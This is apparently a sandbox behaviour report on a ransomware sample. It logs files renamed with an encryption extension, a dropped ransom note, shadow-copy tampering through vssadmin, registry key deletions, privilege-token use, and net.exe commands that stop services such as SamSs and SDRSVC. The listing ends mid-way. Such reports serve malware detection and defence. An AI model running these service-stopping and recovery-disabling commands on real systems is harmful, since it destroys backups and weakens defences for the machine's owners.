File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496926306.profile.gz.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_UDM3wmGVyaw0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_J4pmeqDADjA0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-125_contrast-white.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\11.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main-selector.css.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_PkTd1_LeDyI0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_dg9IXi3igwQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ul-oob.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_XGYOS4ofS8o0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\bigsmile.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailLargeTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_O2cnd3eq5Og0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_TatpvflUFuU0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_I43Fb5E1LwI0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSmallTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_link_18.svg.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_rnudMbOH3fU0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_5Po6Ebfagms0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\8041_40x40x32.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\MedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_Yx9WfN-CpJg0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail-ul-oob.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_It0oHGMeD-c0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Workflow\Density_Hollow.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-150_8wekyb3d8bbwe\AppxSignature.p7x C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\over-arrow-navigation.svg.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_yZxScI3L8XQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_O7fsKlOqOu00.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ul.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_rt4lVhRbHqE0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Rounded Rectangle.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\plugin.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_V3YMC68TTfg0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_83lKZbk3zcs0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\BooleanIntersect.scale-180.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\osf\progress.gif C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2708 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 3996 wrote to memory of 804 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3996 wrote to memory of 804 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 852 wrote to memory of 1028 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 852 wrote to memory of 1028 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 3516 wrote to memory of 3568 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3516 wrote to memory of 3568 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 652 wrote to memory of 1588 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 652 wrote to memory of 1588 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 3420 wrote to memory of 3764 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3420 wrote to memory of 3764 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 3708 wrote to memory of 1724 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3708 wrote to memory of 1724 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 1528 wrote to memory of 500 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1528 wrote to memory of 500 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 856 wrote to memory of 1684 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 856 wrote to memory of 1684 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2688 wrote to memory of 3148 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2688 wrote to memory of 3148 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe
PID 2708 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe

"C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

